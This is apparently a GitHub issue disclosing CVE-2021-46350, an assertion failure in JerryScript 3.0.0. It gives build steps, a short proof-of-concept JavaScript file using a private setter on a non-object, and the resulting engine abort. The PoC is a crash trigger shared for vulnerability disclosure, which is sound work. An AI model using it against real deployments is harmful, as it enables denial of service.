Headline
CVE-2021-46350: Assertion 'ecma_is_value_object (value)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-value.c(ecma_get_object_from_value):838. · Issue #4936 · jerryscript-project/jerryscript
There is an Assertion 'ecma_is_value_object (value)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-value.c in JerryScript 3.0.0.
JerryScript revision
Commit: a6ab5e9
Version: v3.0.0
Build platform
Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20
Test casepoc.js
class JSEtest {
set #m(v) { this._v = v; }
method() {
let self = !this;
function innerFunction() {
self.#m = 'Test262';
}
innerFunction();
}
}
let c = new JSEtest();
c.method();
assert.sameValue(c._v, 'Test262');
let o = {};
assert.throws(TypeError, function () {
c.method.call(o);
}, 'accessed private setter from an ordinary object');
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'ecma_is_value_object (value)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-value.c(ecma_get_object_from_value):838. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 25286 abort jerry poc.js
Credits: Found by OWL337 team.